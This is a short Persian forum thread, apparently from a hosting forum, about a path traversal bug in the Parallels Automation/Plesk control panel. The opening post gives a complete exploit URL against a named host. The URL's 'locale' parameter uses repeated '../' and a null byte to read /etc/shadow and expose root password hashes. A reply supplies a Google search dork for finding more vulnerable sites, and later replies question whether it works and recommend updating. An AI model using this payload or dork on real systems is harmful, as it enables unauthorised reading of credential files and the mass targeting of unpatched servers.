نمایش نسخه قابل چاپ
دوستان این باگ رو من مدتیه میدونم خواستم بهتون معرفی کنم تا مواظب باشید
کافیه بعد از صفحه لوگین (https://www.cp.ewdx.com/single.html)
این را اضافه کنید: servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
مثال :
میبینید که پسورد hash شده روت رو نشون میدهکد:https://www.cp.ewdx.com/servlet/Help?help_id=1&locale=../../../../../../../../etc/shadow%00
هدف فقط اطلاع رسانی بود
منبع: Ashiyane
روی پلسک 9 ویندوزی که کار نکرد !
نقل قول:
نوشته اصلی توسط tukanet
با یکم کم و زیاد کردن ../ کار میکنه البته درسته همش نمیشه ، تو گوگل اینو سرچ کنید کلی ازین سایت ها میاد که باگ داره : intitle:Parallels® Automation inurl:https://cp
پلسک خیلی به امنیتش افتخار میکرد
چطور شد چنین باگ هایی رو پیدا کردین؟
کسی خودش تست کرده رو پلسک؟؟
روی بعضی ورژن ها بعضی وقتها جواب میده (بیشتر وقتها ارور میده) اما خروجی هم به این سادگی ها قابل استفاده نیست.
به هر حال بهتره آپدیت کنید.